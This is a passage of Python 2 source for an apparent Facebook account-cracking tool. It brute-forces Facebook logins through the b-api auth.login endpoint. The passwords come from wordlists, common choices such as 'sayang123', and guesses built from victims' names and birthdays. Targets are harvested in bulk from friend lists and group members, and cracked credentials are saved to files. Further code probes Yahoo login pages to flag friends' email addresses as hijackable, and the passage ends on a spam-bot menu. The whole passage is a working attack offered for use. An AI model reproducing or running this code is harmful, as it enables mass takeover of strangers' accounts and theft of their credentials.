data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mOK✓\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mCP✚\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(1)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
    """Render the bot sub-menu (reactions/comments/mass actions) and delegate
    choice handling to bot_pilih()."""
    os.system('reset')
    # Require a cached token; wipe it and force re-login when missing.
    try:
        toket=open('login.txt','r').read()
    except IOError:
        print"\033[1;91m[!] Token not found"
        os.system('rm -rf login.txt')
        time.sleep(1)
        login()
    os.system('reset')
    print logo
    print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
    print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
    print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
    print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
    print "║"
    bot_pilih()
#////////////
def bot_pilih():
    """Read the bot-menu choice and dispatch; recurses on invalid input."""
    bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
    if bots =="":
        print "\033[1;91m[!] Wrong input"
        bot_pilih()
    elif bots =="1":
        menu_react()
    elif bots =="2":
        grup_react()
    elif bots =="3":
        bot_komen()
    elif bots =="4":
        grup_komen()
    elif bots =="5":
        deletepost()
    elif bots =="6":
        accept()
